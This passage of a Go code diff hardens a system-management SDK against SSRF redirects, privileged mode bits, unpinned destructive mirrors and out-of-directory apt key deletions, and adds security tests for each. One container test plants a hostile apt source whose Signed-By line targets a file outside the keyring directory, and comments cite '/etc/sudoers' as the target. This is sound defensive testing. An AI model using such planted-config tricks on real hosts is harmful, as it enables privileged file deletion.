+				return fmt.Errorf("%w: refusing cross-host redirect %s -> %s", ErrInvalidConfig, via[0].URL.Host, req.URL.Host)
+			}
+			if len(via) >= 10 {
+				return fmt.Errorf("%w: stopped after 10 redirects", ErrInvalidConfig)
+			}
+			return nil
+		},
 	}
 }
 
 func validateHTTPConfig(cfg *HTTPConfig) error {
 	if cfg.Prune && !cfg.Extract {
 		return fmt.Errorf("%w: prune requires extract", ErrInvalidConfig)
+	}
+	// extract+prune DELETES pre-existing files in the destination tree, so a
+	// poisoned origin could weaponize it; require an integrity pin so the bytes
+	// that drive the prune are verified before anything is removed.
+	if cfg.Extract && cfg.Prune && cfg.ChecksumSHA256 == "" {
+		return fmt.Errorf("%w: extract+prune requires a checksum_sha256 (the prune deletes files; the payload must be integrity-pinned)", ErrInvalidConfig)
+	}
+	// A negative byte cap is a caller error; never silently fall back to the
+	// default (which would lift the intended limit).
+	if cfg.MaxBytes < 0 {
+		return fmt.Errorf("%w: max_bytes must not be negative", ErrInvalidConfig)
+	}
+	if err := validateModeBits(cfg.Mode); err != nil {
+		return err
+	}
+	return nil
+}
+
+// validateModeBits rejects a Mode that sets the setuid/setgid/sticky bits on a
+// downloaded artifact — a downloaded setuid-root helper is a privilege-escalation
+// dropper. Empty Mode is allowed (no chmod). The octal parsing mirrors applyMode.
+func validateModeBits(mode string) error {
+	if mode == "" {
+		return nil
+	}
+	bits, err := strconv.ParseUint(strings.TrimPrefix(mode, "0"), 8, 32)
+	if err != nil {
+		return fmt.Errorf("%w: invalid mode %q", ErrInvalidConfig, mode)
+	}
+	if bits&0o7000 != 0 { // setuid(4000) | setgid(2000) | sticky(1000)
+		return fmt.Errorf("%w: mode %q sets privileged bits (setuid/setgid/sticky), refused for a downloaded artifact", ErrInvalidConfig, mode)
 	}
 	return nil
 }

--- a/sys/remote/http.go
+++ b/sys/remote/http.go
@@ -280,7 +280,10 @@ func (h *httpSource) openBody(ctx context.Context, etag string) (io.ReadCloser, 
 // the returned tmpPath is empty in that case so the caller can't
 // accidentally reference a non-existent path.
 func streamToTmp(dest string, body io.Reader, maxBytes int64) (string, int64, []byte, error) {
-	tmp := tmpPathFor(dest)
+	tmp, err := tmpPathFor(dest)
+	if err != nil {
+		return "", 0, nil, err
+	}
 	if err := os.MkdirAll(filepath.Dir(tmp), 0o755); err != nil {
 		return "", 0, nil, fmt.Errorf("mkdir %s: %w", filepath.Dir(tmp), err)
 	}
@@ -326,14 +329,18 @@ func streamToTmp(dest string, body io.Reader, maxBytes int64) (string, int64, []
 	return tmp, n, h.Sum(nil), nil
 }
 
-// tmpPathFor builds a deterministic-within-process sibling tmp filename.
-// Sixteen random hex chars keep collisions astronomically unlikely while
-// keeping the suffix short enough that ext4's 255-char filename limit
-// doesn't bite.
-func tmpPathFor(dest string) string {
+// tmpPathFor builds an unpredictable sibling tmp filename. Sixteen random hex
+// chars keep collisions astronomically unlikely while keeping the suffix short
+// enough that ext4's 255-char filename limit doesn't bite. The entropy read is
+// fail-closed: if crypto/rand cannot produce randomness the suffix would be
+// predictable, letting an attacker pre-create a symlink at the staging path, so
+// the error is propagated rather than discarded.
+func tmpPathFor(dest string) (string, error) {
 	var b [8]byte
-	_, _ = rand.Read(b[:])
-	return dest + ".tmp." + hex.EncodeToString(b[:])
+	if _, err := rand.Read(b[:]); err != nil {
+		return "", fmt.Errorf("generate staging-file suffix: %w", err)
+	}
+	return dest + ".tmp." + hex.EncodeToString(b[:]), nil
 }
 
 // applyMode sets mode and/or ownership on the freshly-written destination, which

--- a/sys/remote/http_test.go
+++ b/sys/remote/http_test.go
@@ -251,6 +251,39 @@ func TestHTTPFetch_AppliesMode(t *testing.T) {
 	}
 }
 
+// TestHTTPFetch_RejectsCrossHostRedirect pins the SSRF boundary: a URL that
+// passed validation must not be allowed to bounce the agent to a different host
+// during Fetch.
+func TestHTTPFetch_RejectsCrossHostRedirect(t *testing.T) {
+	targetGets := atomic.Int32{}
+	target := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		targetGets.Add(1)
+		_, _ = w.Write([]byte("redirected payload"))
+	}))
+	t.Cleanup(target.Close)
+
+	redirector := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		http.Redirect(w, r, target.URL+"/payload", http.StatusFound)
+	}))
+	t.Cleanup(redirector.Close)
+
+	dest := filepath.Join(t.TempDir(), "file")
+	recordDestUnder(t, dest)
+	src, err := NewHTTP(HTTPConfig{URL: redirector.URL + "/start"})
+	if err != nil {
+		t.Fatalf("NewHTTP: %v", err)
+	}
+	if _, err := src.Fetch(context.Background(), dest); err == nil {
+		t.Fatal("Fetch followed a cross-host redirect, want a validation error")
+	}
+	if got := targetGets.Load(); got != 0 {
+		t.Fatalf("redirect target received %d request(s); cross-host redirect should be refused before SSRF", got)
+	}
+	if _, err := os.Stat(dest); !os.IsNotExist(err) {
+		t.Fatalf("dest should not exist after refused redirect; stat err = %v", err)
+	}
+}
+
 // TestHTTPFetch_RejectsUnsafeDest — dest validation is mandatory even
 // when the rest of the config is fine. A non-absolute path must fail
 // before any network traffic.

--- a/sys/remote/http_test.go
+++ b/sys/remote/http_test.go
@@ -284,6 +284,40 @@ func TestHTTPFetch_RejectsCrossHostRedirect(t *testing.T) {
 	}
 }
 
+// TestDefaultHTTPClient_RejectsSchemeDowngradeRedirect pins the redirect-origin
+// guard at the function level: CheckRedirect must refuse a scheme change (an
+// https -> http TLS downgrade) and a host change, while allowing a same-origin
+// path redirect and bounding the redirect count. Exercised directly so the scheme
+// check is isolated from the host:port difference a real two-server test forces.
+func TestDefaultHTTPClient_RejectsSchemeDowngradeRedirect(t *testing.T) {
+	check := defaultHTTPClient().CheckRedirect
+	req := func(raw string) *http.Request {
+		r, err := http.NewRequest(http.MethodGet, raw, nil)
+		if err != nil {
+			t.Fatalf("build request %q: %v", raw, err)
+		}
+		return r
+	}
+	via := []*http.Request{req("https://host.example/a")}
+
+	if err := check(req("http://host.example/a"), via); err == nil {
+		t.Error("CheckRedirect allowed an https->http downgrade on the same host (TLS downgrade)")
+	}
+	if err := check(req("https://other.example/a"), via); err == nil {
+		t.Error("CheckRedirect allowed a cross-host redirect")
+	}
+	if err := check(req("https://host.example/b"), via); err != nil {
+		t.Errorf("CheckRedirect rejected a same-origin path redirect: %v", err)
+	}
+	long := make([]*http.Request, 10)
+	for i := range long {
+		long[i] = req("https://host.example/a")
+	}
+	if err := check(req("https://host.example/z"), long); err == nil {
+		t.Error("CheckRedirect allowed more than 10 redirects")
+	}
+}
+
 // TestHTTPFetch_RejectsUnsafeDest — dest validation is mandatory even
 // when the rest of the config is fine. A non-absolute path must fail
 // before any network traffic.

--- a/sys/remote/remote_http_test.go
+++ b/sys/remote/remote_http_test.go
@@ -93,6 +93,19 @@ func TestNewHTTP_RejectsPrivilegedModeBits(t *testing.T) {
 	}
 }
 
+// TestNewHTTP_AcceptsOctalZeroAndLeadingZeroModes pins that valid octal modes —
+// including octal zero "0" and leading-zero forms — are NOT rejected by the mode
+// validator. (A naive TrimPrefix(mode,"0") turns "0" into "" and wrongly fails it.)
+func TestNewHTTP_AcceptsOctalZeroAndLeadingZeroModes(t *testing.T) {
+	for _, mode := range []string{"0", "0755", "755", "0644", "000"} {
+		t.Run(mode, func(t *testing.T) {
+			if _, err := NewHTTP(HTTPConfig{URL: "https://example.test/file", Mode: mode}); err != nil {
+				t.Fatalf("NewHTTP(Mode=%q) = %v; want nil (valid octal mode)", mode, err)
+			}
+		})
+	}
+}
+
 // TestNewHTTP_RejectsBadChecksum — partial / non-hex / wrong-length
 // checksum strings get rejected up front so a Fetch never silently runs
 // without integrity verification.

--- a/sys/remote/remote_http_test.go
+++ b/sys/remote/remote_http_test.go
@@ -68,6 +68,31 @@ func TestNewHTTP_RejectsPruneWithoutExtract(t *testing.T) {
 	}
 }
 
+func TestNewHTTP_RejectsExtractPruneWithoutChecksum(t *testing.T) {
+	_, err := NewHTTP(HTTPConfig{URL: "https://example.test/archive.tar.gz", Extract: true, Prune: true})
+	if !errors.Is(err, ErrInvalidConfig) {
+		t.Fatalf("NewHTTP(Extract+Prune without checksum) = %v; want ErrInvalidConfig", err)
+	}
+}
+
+func TestNewHTTP_RejectsNegativeMaxBytes(t *testing.T) {
+	_, err := NewHTTP(HTTPConfig{URL: "https://example.test/file", MaxBytes: -1})
+	if !errors.Is(err, ErrInvalidConfig) {
+		t.Fatalf("NewHTTP(MaxBytes=-1) = %v; want ErrInvalidConfig", err)
+	}
+}
+
+func TestNewHTTP_RejectsPrivilegedModeBits(t *testing.T) {
+	for _, mode := range []string{"4755", "2755", "1777"} {
+		t.Run(mode, func(t *testing.T) {
+			_, err := NewHTTP(HTTPConfig{URL: "https://example.test/file", Mode: mode})
+			if !errors.Is(err, ErrInvalidConfig) {
+				t.Fatalf("NewHTTP(Mode=%q) = %v; want ErrInvalidConfig", mode, err)
+			}
+		})
+	}
+}
+
 // TestNewHTTP_RejectsBadChecksum — partial / non-hex / wrong-length
 // checksum strings get rejected up front so a Fetch never silently runs
 // without integrity verification.

--- a/sys/remote/security_machine_test.go
+++ b/sys/remote/security_machine_test.go
@@ -1,0 +1,140 @@
+package remote
+
+import (
+	"context"
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"sync/atomic"
+	"testing"
+)
+
+type httpIngressAction int
+
+const (
+	httpIngressPinnedFile httpIngressAction = iota
+	httpIngressCrossHostRedirect
+	httpIngressNegativeSizeCap
+	httpIngressPrivilegedMode
+	httpIngressDestructiveUnpinnedMirror
+)
+
+type httpIngressStep struct {
+	name          string
+	action        httpIngressAction
+	wantNewErr    error
+	wantFetchErr  error
+	wantNoNetwork bool
+	wantNoDisk    bool
+}
+
+// TestHTTPIngressSecurityMachine models the remote-source trust boundary as a
+// small deterministic automaton: untrusted URL/config input may transition to a
+// local filesystem mutation only through the states that keep origin, integrity,
+// size, and mode constraints intact. Every reject transition must stop before
+// network IO or disk mutation.
+func TestHTTPIngressSecurityMachine(t *testing.T) {
+	payload := []byte("agent payload\n")
+	sum := sha256.Sum256(payload)
+	checksum := hex.EncodeToString(sum[:])
+
+	steps := []httpIngressStep{
+		{name: "pinned file may enter disk state", action: httpIngressPinnedFile},
+		{name: "redirect to another authority stays rejected", action: httpIngressCrossHostRedirect, wantFetchErr: ErrInvalidConfig, wantNoDisk: true},
+		{name: "negative size cap stays rejected before fetch", action: httpIngressNegativeSizeCap, wantNewErr: ErrInvalidConfig, wantNoNetwork: true, wantNoDisk: true},
+		{name: "privileged mode bits stay rejected before fetch", action: httpIngressPrivilegedMode, wantNewErr: ErrInvalidConfig, wantNoNetwork: true, wantNoDisk: true},
+		{name: "extract prune mirror needs integrity pin", action: httpIngressDestructiveUnpinnedMirror, wantNewErr: ErrInvalidConfig, wantNoNetwork: true, wantNoDisk: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			machine := newHTTPIngressMachine(t, payload)
+			cfg := HTTPConfig{URL: machine.origin.URL + "/payload", ChecksumSHA256: checksum}
+			switch step.action {
+			case httpIngressPinnedFile:
+				// Baseline accepted transition.
+			case httpIngressCrossHostRedirect:
+				cfg.URL = machine.redirector.URL + "/start"
+			case httpIngressNegativeSizeCap:
+				cfg.MaxBytes = -1
+			case httpIngressPrivilegedMode:
+				cfg.Mode = "4755"
+			case httpIngressDestructiveUnpinnedMirror:
+				cfg.ChecksumSHA256 = ""
+				cfg.Extract = true
+				cfg.Prune = true
+			}
+
+			dest := filepath.Join(t.TempDir(), "payload")
+			recordDestUnder(t, dest)
+			src, err := NewHTTP(cfg)
+			if step.wantNewErr != nil {
+				if !errors.Is(err, step.wantNewErr) {
+					t.Fatalf("NewHTTP(%s) = %v, want %v", step.name, err, step.wantNewErr)
+				}
+				machine.assertNoSideEffects(t, dest, step)
+				return
+			}
+			if err != nil {
+				t.Fatalf("NewHTTP(%s): %v", step.name, err)
+			}
+
+			_, err = src.Fetch(context.Background(), dest)
+			if step.wantFetchErr != nil {
+				if !errors.Is(err, step.wantFetchErr) {
+					t.Fatalf("Fetch(%s) = %v, want %v", step.name, err, step.wantFetchErr)
+				}
+				machine.assertNoSideEffects(t, dest, step)
+				return
+			}
+			if err != nil {
+				t.Fatalf("Fetch(%s): %v", step.name, err)
+			}
+			if got, err := os.ReadFile(dest); err != nil || string(got) != string(payload) {
+				t.Fatalf("accepted transition wrote %q err=%v, want payload %q", got, err, payload)
+			}
+		})
+	}
+}
+
+type httpIngressMachine struct {
+	originGets   atomic.Int32
+	redirectGets atomic.Int32
+	origin       *httptest.Server
+	redirector   *httptest.Server
+}
+
+func newHTTPIngressMachine(t *testing.T, payload []byte) *httpIngressMachine {
+	t.Helper()
+	m := &httpIngressMachine{}
+	m.origin = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		m.originGets.Add(1)
+		_, _ = w.Write(payload)
+	}))
+	t.Cleanup(m.origin.Close)
+	m.redirector = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		m.redirectGets.Add(1)
+		http.Redirect(w, r, m.origin.URL+"/payload", http.StatusFound)
+	}))
+	t.Cleanup(m.redirector.Close)
+	return m
+}
+
+func (m *httpIngressMachine) assertNoSideEffects(t *testing.T, dest string, step httpIngressStep) {
+	t.Helper()
+	if step.wantNoNetwork && m.originGets.Load()+m.redirectGets.Load() != 0 {
+		t.Fatalf("%s performed network IO: origin=%d redirector=%d", step.name, m.originGets.Load(), m.redirectGets.Load())
+	}
+	if step.action == httpIngressCrossHostRedirect && m.originGets.Load() != 0 {
+		t.Fatalf("%s reached redirected origin %d time(s)", step.name, m.originGets.Load())
+	}
+	if step.wantNoDisk {
+		if _, err := os.Stat(dest); !os.IsNotExist(err) {
+			t.Fatalf("%s mutated destination; stat err=%v", step.name, err)
+		}
+	}
+}

--- a/sys/repo/apt.go
+++ b/sys/repo/apt.go
@@ -25,6 +25,27 @@ func aptLegacyKeyFile(name string) string  { return aptLegacyKeyDir + "/" + name
 // `deb [signed-by=/etc/apt/keyrings/x.gpg] https://…`.
 var aptListSignedBy = regexp.MustCompile(`signed-by=([^\s\]]+)`)
 
+// isAptKeyringPath reports whether p is a file directly inside one of the two
+// directories where apt signing keyrings legitimately live. Cleanup only removes
+// Signed-By targets that pass this jail, so an attacker-controlled source file
+// cannot point Signed-By at an arbitrary path (e.g. /etc/sudoers) and turn repo
+// reconfiguration into an arbitrary privileged delete. A path is in-jail only if
+// it is a direct child of the directory — no traversal, no nested subdirectory.
+func isAptKeyringPath(p string) bool {
+	for _, dir := range []string{aptKeyringDir, aptLegacyKeyDir} {
+		prefix := dir + "/"
+		if !strings.HasPrefix(p, prefix) {
+			continue
+		}
+		rest := p[len(prefix):]
+		if rest == "" || strings.Contains(rest, "/") || strings.Contains(rest, "..") {
+			return false
+		}
+		return true
+	}
+	return false
+}
+
 // applyApt writes the modern deb822 source to /etc/apt/sources.list.d/<name>.sources,
 // installs the (dearmored) signing key under /etc/apt/keyrings, removes any
 // conflicting prior configuration of the same URL, and refreshes the index. It is
@@ -242,6 +263,15 @@ func (m *manager) removeConflictKeys(ctx context.Context, filename, content, ski
 	}
 	for _, keyPath := range keyPaths {
 		if keyPath == skipKeyFile || !strings.HasPrefix(keyPath, "/") {
+			continue
+		}
+		// Only remove paths inside the apt keyring jail. A hostile Signed-By in a
+		// conflicting source file is attacker-controlled config; honoring an
+		// arbitrary absolute path here would turn repo cleanup into an arbitrary
+		// privileged file delete (e.g. Signed-By: /etc/sudoers). Refuse anything
+		// outside the directories apt keyrings legitimately live in.
+		if !isAptKeyringPath(keyPath) {
+			fmt.Fprintf(log, "refusing to remove out-of-jail Signed-By key: %s\n", keyPath)
 			continue
 		}
 		fmt.Fprintf(log, "removing associated GPG key: %s\n", keyPath)

--- a/sys/repo/dnf.go
+++ b/sys/repo/dnf.go
@@ -61,8 +61,12 @@ func (m *manager) applyDnf(ctx context.Context, name string, c *DnfConfig) (Outc
 	}
 	fmt.Fprintf(&log, "configured repository: %s\n", name)
 
-	// rpm --import is idempotent (re-importing an existing key is a no-op).
-	if c.GPGKey != "" {
+	// rpm --import is idempotent (re-importing an existing key is a no-op). The
+	// key is imported ONLY when signature checking is on: with gpgcheck=0 the
+	// gpgkey= line is dropped from the .repo, so importing the key would silently
+	// trust it system-wide while the repository itself verifies nothing — a trust
+	// downgrade. Honor gpgcheck as the single switch and never import behind it.
+	if c.GPGCheck && c.GPGKey != "" {
 		res, kerr := m.runPriv(ctx, "rpm", pmexec.SeparatePositionals([]string{"--import"}, c.GPGKey)...)
 		if res.Stdout != "" {
 			log.WriteString(res.Stdout)

--- a/sys/repo/dnf_test.go
+++ b/sys/repo/dnf_test.go
@@ -64,6 +64,22 @@ func TestDnf_Apply_NoKeyDisabledNoGpgcheck(t *testing.T) {
 	}
 }
 
+func TestDnf_Apply_GPGCheckFalseIgnoresKey(t *testing.T) {
+	m, ff, fr := newTestManager(t, pkg.Dnf)
+	if _, err := m.Apply(context.Background(), Repository{Name: "r", Dnf: &DnfConfig{
+		BaseURL: "https://h/r", Enabled: true, GPGCheck: false, GPGKey: "https://h/KEY",
+	}}); err != nil {
+		t.Fatal(err)
+	}
+	body := ff.wrote("/etc/yum.repos.d/r.repo")
+	if strings.Contains(body, "gpgkey=") {
+		t.Fatalf("repo file contains gpgkey despite gpgcheck=0:\n%s", body)
+	}
+	if got := argvs(fr); len(got) != 1 || got[0] != "dnf -y makecache --repo r" {
+		t.Fatalf("commands = %v, want only makecache and no rpm import", got)
+	}
+}
+
 func TestDnf_Apply_Idempotent(t *testing.T) {
 	m, ff, fr := newTestManager(t, pkg.Dnf)
 	desired := "[r]\nname=r\nbaseurl=https://h/r\nenabled=1\ngpgcheck=0\n"

--- a/sys/repo/pacman.go
+++ b/sys/repo/pacman.go
@@ -86,6 +86,11 @@ func (m *manager) applyPacman(ctx context.Context, name string, c *PacmanConfig)
 // removePacman removes the repository's section from /etc/pacman.conf. Removing
 // an absent section is an idempotent no-op.
 func (m *manager) removePacman(ctx context.Context, name string) (Outcome, error) {
+	// Refuse to operate on the reserved [options] section: removePacmanSection
+	// would strip pacman.conf's global settings block, not a repository.
+	if err := validatePacmanName(name); err != nil {
+		return Outcome{}, err
+	}
 	var log strings.Builder
 	confBytes, err := m.fsm.ReadFile(ctx, pacmanConf)
 	if err != nil {

--- a/sys/repo/repo_container_test.go
+++ b/sys/repo/repo_container_test.go
@@ -167,8 +167,12 @@ func TestDnf_ApplyRemove_Container(t *testing.T) {
 	repoFile := dnfRepoFile(name)
 	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
 
+	// Happy path is a SIGNED, gpg-checked repo (the secure default). The insecure
+	// gpgcheck=0 operator override is exercised separately in
+	// repo_security_container_test.go so it is never modelled as the normal case.
 	repo := Repository{Name: name, Dnf: &DnfConfig{
-		BaseURL: "https://example.com/pm-test-el9", Description: "PM Test", Enabled: true, GPGCheck: false,
+		BaseURL: "https://example.com/pm-test-el9", Description: "PM Test", Enabled: true,
+		GPGCheck: true, GPGKey: "https://example.com/pm-test-el9/RPM-GPG-KEY",
 	}}
 
 	o, err := m.Apply(ctx, repo)
@@ -179,7 +183,7 @@ func TestDnf_ApplyRemove_Container(t *testing.T) {
 		t.Error("first Apply should report Changed=true")
 	}
 	body := readFile(t, repoFile)
-	for _, want := range []string{"[" + name + "]", "name=PM Test", "baseurl=https://example.com/pm-test-el9", "enabled=1", "gpgcheck=0"} {
+	for _, want := range []string{"[" + name + "]", "name=PM Test", "baseurl=https://example.com/pm-test-el9", "enabled=1", "gpgcheck=1", "gpgkey=https://example.com/pm-test-el9/RPM-GPG-KEY"} {
 		if !strings.Contains(body, want) {
 			t.Errorf(".repo missing %q:\n%s", want, body)
 		}
@@ -210,8 +214,10 @@ func TestPacman_ApplyRemove_Container(t *testing.T) {
 	const name = "pm-test-pacman"
 	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
 
+	// Happy path requires a valid signature (the secure default). The TrustAll
+	// operator override is pinned separately in repo_security_container_test.go.
 	repo := Repository{Name: name, Pacman: &PacmanConfig{
-		Server: "https://example.com/pm-test-arch/$repo/os/$arch", SigLevel: "Optional TrustAll",
+		Server: "https://example.com/pm-test-arch/$repo/os/$arch", SigLevel: "Required DatabaseOptional",
 	}}
 
 	o, err := m.Apply(ctx, repo)
@@ -222,7 +228,7 @@ func TestPacman_ApplyRemove_Container(t *testing.T) {
 		t.Error("first Apply should report Changed=true")
 	}
 	conf := readFile(t, pacmanConf)
-	for _, want := range []string{"[" + name + "]", "SigLevel = Optional TrustAll", "Server = https://example.com/pm-test-arch/$repo/os/$arch"} {
+	for _, want := range []string{"[" + name + "]", "SigLevel = Required DatabaseOptional", "Server = https://example.com/pm-test-arch/$repo/os/$arch"} {
 		if !strings.Contains(conf, want) {
 			t.Errorf("pacman.conf missing %q", want)
 		}
@@ -257,8 +263,10 @@ func TestZypper_ApplyRemove_Container(t *testing.T) {
 	const name = "pm-test-zypper"
 	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
 
+	// Happy path keeps signature checking ON (the secure default); the
+	// --no-gpgcheck operator override lives in repo_security_container_test.go.
 	repo := Repository{Name: name, Zypper: &ZypperConfig{
-		URL: "https://example.com/pm-test-suite", Description: "PM Test", Enabled: false, Autorefresh: false, GPGCheck: false,
+		URL: "https://example.com/pm-test-suite", Description: "PM Test", Enabled: false, Autorefresh: false, GPGCheck: true,
 	}}
 
 	o, err := m.Apply(ctx, repo)

--- a/sys/repo/repo_security_container_test.go
+++ b/sys/repo/repo_security_container_test.go
@@ -1,0 +1,381 @@
+//go:build container
+
+// Real-execution SECURITY tests for the repository Manager — the hostile
+// counterpart to repo_container_test.go's happy paths. Package repo is a
+// supply-chain trust boundary: a wrong configuration lets a managed host install
+// attacker-controlled packages as root. The hermetic fake-runner tests in
+// security_machine_test.go / validate_test.go pin these controls against scripted
+// output; the tests here drive the SAME controls through the REAL package-manager
+// tooling, the real `gpg --dearmor`, and the real fd-anchored filesystem, so a
+// drift in any of those (a gpg exit-code change, a deb822/.repo/pacman.conf parse
+// change, an fs.Manager removal-confinement regression) is caught against ground
+// truth rather than a mock.
+//
+// Policy note: apt `Trusted: yes`, dnf `gpgcheck=0`, zypper `--no-gpgcheck`, and
+// pacman `TrustAll` are documented OPERATOR CHOICES (per the 2026-06 policy, same
+// as WS8) — they are NOT rejected. The "operator override" tests below PIN them as
+// allowed-by-design so a future change that silently starts rejecting them is
+// caught. The trust downgrade that IS refused — pacman `SigLevel Never` (signature
+// verification disabled, no valid per-invocation semantics) — and the reserved
+// `[options]` name are exercised as real rejections that leave the host untouched.
+//
+// Every lane runs as root, so the Direct runner is correct and direct os.* writes
+// stand in for an attacker who has already planted conflicting config. All tests
+// are Detect-gated and hermetic: no external repo is ever fetched (unreachable
+// example.com URLs + parser/cacheonly probes).
+package repo
+
+import (
+	"context"
+	"errors"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/pkg"
+)
+
+// armoredTestKey2 is a SECOND throwaway ed25519 PUBLIC key (no secret committed),
+// distinct from armoredTestKey, used to exercise real key ROTATION: a re-Apply
+// with a different key must re-dearmor and replace the on-disk keyring.
+const armoredTestKey2 = `-----BEGIN PGP PUBLIC KEY BLOCK-----
+
+mDMEajeV+BYJKwYBBAHaRw8BAQdAxo9qGCe3XUaNKRWUE98ne0eruTOpxaf85Jlm
+Crw1INe0NVBNIFJlcG8gVGVzdCBLZXkgMiA8cmVwby10ZXN0LTJAcG93ZXItbWFu
+YWdlLmludmFsaWQ+iJMEExYKADsWIQQdwrxp0Zm6NyeuKiSY6wjO212V4AUCajeV
++AIbIwULCQgHAgIiAgYVCgkICwIEFgIDAQIeBwIXgAAKCRCY6wjO212V4B/oAQDX
+IzP53rgn9zz6rhzYNLf7yWtog0MbeGAjFPy5/B2G3gEAuhJEqqjp+uBXM0MvYrfc
+547DbFV618I2mEz+yeMz7gI=
+=CJdT
+-----END PGP PUBLIC KEY BLOCK-----
+`
+
+// --- APT -------------------------------------------------------------------
+
+// TestRepoSecurity_AptMalformedKey_Rejected_Container drives a non-PGP blob as the
+// signing key. Real `gpg --dearmor` exits non-zero on garbage, so the key path
+// must FAIL CLOSED: Apply returns an error and writes NEITHER the .sources NOR the
+// keyring. A partial write here would leave a repo configured to fetch packages
+// the host cannot verify.
+func TestRepoSecurity_AptMalformedKey_Rejected_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Apt)
+	ctx := repoCtx(t)
+	const name = "pm-sec-apt-badkey"
+	repoFile, keyFile := aptRepoFile(name), aptKeyFile(name)
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	_, err := m.Apply(ctx, Repository{Name: name, Apt: &AptConfig{
+		URL:          "https://example.com/pm-sec-debian",
+		Distribution: "bookworm",
+		Components:   []string{"main"},
+		GPGKey:       []byte("this is definitely not an OpenPGP public key"),
+	}})
+	if err == nil {
+		t.Fatal("Apply accepted a malformed GPG key; expected real gpg --dearmor to fail the Apply closed")
+	}
+	if fileExists(repoFile) {
+		t.Errorf("malformed-key Apply still wrote the .sources file %s — must not configure a repo whose key failed", repoFile)
+	}
+	if fileExists(keyFile) {
+		t.Errorf("malformed-key Apply wrote a keyring %s from un-dearmorable input", keyFile)
+	}
+}
+
+// TestRepoSecurity_AptConflictCleanupConfinedToKeyringJail_Container plants a
+// hostile pre-existing source that references the same URL and carries two
+// Signed-By targets: one inside the apt keyring jail and one OUTSIDE it (a stand-in
+// for /etc/sudoers). Applying the real repo triggers conflict cleanup, which must
+// remove the conflicting source and its in-jail key but REFUSE to delete the
+// out-of-jail target — otherwise attacker-controlled config turns repo
+// reconfiguration into an arbitrary privileged file delete. This drives the real
+// fd-anchored fs.Manager removal, not a fake.
+func TestRepoSecurity_AptConflictCleanupConfinedToKeyringJail_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Apt)
+	ctx := repoCtx(t)
+	const name = "pm-sec-apt-conflict"
+	const url = "https://example.com/pm-sec-conflict"
+	repoFile, keyFile := aptRepoFile(name), aptKeyFile(name)
+
+	if err := os.MkdirAll(aptKeyringDir, 0o755); err != nil {
+		t.Fatalf("prepare keyring dir: %v", err)
+	}
+	decoySource := aptSourcesDir + "/pm-sec-decoy.sources"
+	inJailKey := aptKeyringDir + "/pm-sec-decoy-injail.gpg"
+	outOfJailSentinel := "/etc/pm-sec-out-of-jail-sentinel.gpg" // NOT under any keyring dir
+
+	for path, body := range map[string]string{
+		inJailKey:         "decoy-in-jail-key\n",
+		outOfJailSentinel: "do-not-delete-me\n",
+		decoySource: "Types: deb\nURIs: " + url + "\nSuites: bookworm\nComponents: main\n" +
+			"Signed-By: " + inJailKey + "\n" +
+			"Signed-By: " + outOfJailSentinel + "\n",
+	} {
+		if err := os.WriteFile(path, []byte(body), 0o644); err != nil {
+			t.Fatalf("plant %s: %v", path, err)
+		}
+	}
+	t.Cleanup(func() {
+		_, _ = m.Remove(context.Background(), name)
+		_ = os.Remove(decoySource)
+		_ = os.Remove(inJailKey)
+		_ = os.Remove(outOfJailSentinel)
+	})
+
+	o, err := m.Apply(ctx, Repository{Name: name, Apt: &AptConfig{
+		URL: url, Distribution: "bookworm", Components: []string{"main"}, GPGKey: []byte(armoredTestKey),
+	}})
+	if err != nil {
+		t.Fatalf("Apply(apt conflict): %v", err)
+	}
+
+	if fileExists(decoySource) {
+		t.Errorf("conflicting source %s was not removed by cleanup", decoySource)
+	}
+	if fileExists(inJailKey) {
+		t.Errorf("in-jail decoy keyring %s was not cleaned up (conflict cleanup did not run on the in-jail key)", inJailKey)
+	}
+	if !fileExists(outOfJailSentinel) {
+		t.Errorf("SECURITY: out-of-jail Signed-By target %s was deleted — cleanup escaped the keyring jail (arbitrary privileged delete)", outOfJailSentinel)
+	}
+	if !strings.Contains(o.Result.Stdout, "refusing to remove out-of-jail") {
+		t.Errorf("expected the log to record refusing the out-of-jail key; log:\n%s", o.Result.Stdout)
+	}
+	if !fileExists(repoFile) || !fileExists(keyFile) {
+		t.Errorf("the new repo was not configured: source=%v key=%v", fileExists(repoFile), fileExists(keyFile))
+	}
+}
+
+// TestRepoSecurity_AptKeyRotation_Container exercises the real key lifecycle: an
+// initial key is dearmored and installed, a rotation to a DIFFERENT key replaces
+// the on-disk keyring (Changed=true), and a re-Apply of the rotated key is an
+// idempotent no-op (Changed=false). This pins updateAptKey's differ→rewrite vs
+// already-installed branches against real `gpg --dearmor` output.
+func TestRepoSecurity_AptKeyRotation_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Apt)
+	ctx := repoCtx(t)
+	const name = "pm-sec-apt-rotate"
+	const url = "https://example.com/pm-sec-rotate"
+	keyFile := aptKeyFile(name)
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	repoWith := func(key string) Repository {
+		return Repository{Name: name, Apt: &AptConfig{
+			URL: url, Distribution: "bookworm", Components: []string{"main"}, GPGKey: []byte(key),
+		}}
+	}
+
+	if _, err := m.Apply(ctx, repoWith(armoredTestKey)); err != nil {
+		t.Fatalf("Apply(key A): %v", err)
+	}
+	keyA := readFile(t, keyFile)
+	if keyA == "" || strings.HasPrefix(keyA, "-----BEGIN PGP") {
+		t.Fatalf("key A was not dearmored into the keyring")
+	}
+
+	o, err := m.Apply(ctx, repoWith(armoredTestKey2))
+	if err != nil {
+		t.Fatalf("Apply(key B rotation): %v", err)
+	}
+	if !o.Changed {
+		t.Error("rotating to a different key should report Changed=true")
+	}
+	keyB := readFile(t, keyFile)
+	if keyB == keyA {
